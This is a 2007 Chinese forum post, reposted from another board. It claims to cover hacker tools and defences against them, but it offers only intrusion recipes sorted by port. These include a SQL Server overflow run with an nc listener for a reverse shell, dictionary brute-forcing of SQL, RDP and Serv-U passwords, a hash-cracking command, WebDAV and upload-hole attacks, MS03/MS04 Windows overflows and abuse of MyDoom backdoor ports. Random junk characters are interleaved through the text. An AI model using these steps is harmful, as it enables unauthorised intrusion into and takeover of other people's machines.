|
|
工欲善其事,必先利其器,本文简单介绍目前黑客最常使用的一些入侵工具及防御的方法,希望能对大家有所帮助,以助于大家能更好地防御黑客的攻击。
% T+ v1 e4 q$ t5 \0 M4 I
8 q. g+ g: N) K( A; A V& L, C! k2 j/ v" x+ }3 b. \6 x5 R
1. 1433端口入侵 % w. q9 Q% ]$ @. r. |% t9 y
9 L' F h8 ]! {8 F7 m3 v6 e8 [! B- f* Z scanport.exe 查有1433的机器
, {) M Y V8 g+ [! u8 v3 J: p9 i3 ^2 m% B! `
SQLScanPass.exe 进行字典暴破(字典是关键) * m4 \9 S! a3 i W# m
3 Y+ P, \" R" M- Z# \
最后 SQLTools.exe入侵
: N- [3 n' o% [- Z% }/ l1 R- x% f
============================= 1 h- x; w+ w. K: R. }: d. T
: T1 b9 S* h7 m+ V( K7 l 对sql的sp2及以下的系统,可用sql的hello 溢出漏洞入侵。 : I7 R0 H! f y+ t! D" l+ x
+ a- p1 B/ O0 a! Y nc -vv -l -p 本机端口 sqlhelloF.exe 入侵ip 1433 本机ip 本机端口
$ t1 A9 s5 H R! G; O% b. i0 C3 o$ {5 V! D1 X
(以上反向的,测试成功) " c- {$ @& U$ G* |6 G$ I0 c' H
* `( T3 k/ `! i2 v' ~2 e
sqlhelloz.exe 入侵ip 1433 (这个是正向连接)
) c$ G% b1 O3 [
* w5 l+ l" S* C0 R8 u% e1 J 2. 4899端口入侵 ; l* M" @% V8 ?3 i
% B2 V5 V* E5 f' D9 H l0 \3 g 用4899过滤器.exe,扫描空口令的机器
* s9 v, Y/ H5 B+ G8 ^( e% L* ]1 {$ |/ F, P6 {. ^8 T J$ s
3. 3899的入侵 % _4 F& n+ U) \5 K$ K0 }1 {
* p" x6 w, o( } |2 o0 A, U
对很早的机器,可以试试3389的溢出(win3389ex.exe)
V$ W& {5 z0 ~
( L* |0 y- e7 a: j" F 对2000的机器,可以试试字典暴破。(tscrack.exe)
$ `" Z! ~5 i, g U( v8 P) w $ s! m. `# g6 |' C% c. I
4. 80入侵 0 S4 @9 z% `3 Q! { ]
* y3 R6 Q' |3 k) ]1 r0 {9 q6 s 对sp3以前的机器,可以用webdav入侵;
2 a* g& [: Q: h/ I' a/ K6 u7 P) U; h4 U" d. {1 D- [4 {# F8 r# E3 h
对bbs论坛,可以试试上传漏洞(upfile.exe或dvup_delphi.exe)
5 x4 |( _; j$ c( R6 }/ X7 ]* k# M) k0 \' E! h6 N8 B- Y
可以利用SQL进行注入。(小榕的注入软件)。
8 S' A$ q, s1 T3 d( `+ Z/ k* B" u2 l: ~! f; ^) A+ m
5. serv-u入侵(21端口)
4 L2 E/ U% H2 Z+ u* v& v/ |5 H ~) F1 d( \/ I% B
对5. 004及以下系统,可用溢出入侵。(serv5004.exe)
+ M! S/ |9 t* l2 {+ P) Z0 ^6 J7 E0 H( Q5 {. N
对5.1.0.0及以下系统,可用本地提升权限。(servlocal.exe)
2 `9 ]' y+ R6 D X$ @2 {8 c" Y% N! `* y6 S
====================================== # R) z1 X, l/ S% G# Z# |$ F+ W7 ?& ^
- S" P9 c5 n# o% N) E0 }. s 对serv-u的MD5加密密码,可以用字典暴破。(crack.vbs) 5 T. ^* ]+ J7 e
% ~8 r: {5 H' d# i4 t2 C$ N 输入一个被serv-u加密的密码(34位长),通过与字典档(dict.txt)的比较,得到密码。如:cscript crack.vbs ib0AD10648F17E9E8D1FF316C1BA75105A
6 N' t) y% Z+ m. e- e) ] ( G) Y3 B* Z* G- n8 @7 W- o& F1 V5 z I& Z
6. 554端口
2 [$ {; k; w3 v, z* L6 T( B& b( _7 p0 \% e+ N9 X' j
用real554.exe入侵。
. A2 G5 O3 s' w% L" _% I8 h % @4 [4 T/ p% I& j# l
7. 6129端口 : X7 z/ o/ q; i% C) U5 }
4 W! ^# i6 n7 t1 R- D
用DameWare6129.exe入侵。
3 B' S, |! R, M
; Q' r6 w' j$ U+ O' z$ \( f 8. 系统漏洞 . I9 c: L6 `) Y' b0 c
8 X' s/ S- b9 J9 c' [: o 利用135、445端口,用ms03026、ms03039、ms03049、ms04011漏洞,
4 s2 U( h$ V" g& ]1 Y( |- M" ?5 Z" d- |# b/ C
进行溢出入侵。 ' Y7 L; ]( u/ X4 G' ?" f
: G1 r2 U2 R3 z9 H- e2 d8 B
9. 3127等端口
3 Z: a$ b8 v6 C+ b* F9 f* d' {
' n) U/ @& Y- L" N" M+ s) O 可以利用doom病毒开的端口,用nodoom.exe入侵。(可用mydoomscan.exe查)。 . _/ @* A9 y6 D0 V9 ~" k
/ F+ Q$ F+ B. l4 _) e/ ?
10. 其他入侵 * R* o) ]9 s4 L. o( N; X$ P
$ O$ |7 B. a7 C6 T! L9 u1 j$ w 利用shanlu的入侵软件入侵(WINNTAutoAttack.exe)。
( q% O, r3 c( @; X
- V4 h& P, ^% H6 S: P/ x/ U| 转自杜松论坛:http://www.juniperbbs.net/index.php |
|
|
/1 
IP卡
狗仔卡
发表于 2007-12-17 01:04:27
QQ好友和群
QQ空间
腾讯微博
腾讯朋友
收藏
分享
顶
踩
提升卡
置顶卡
沉默卡
喧嚣卡
变色卡
抢沙发
千斤顶
显身卡
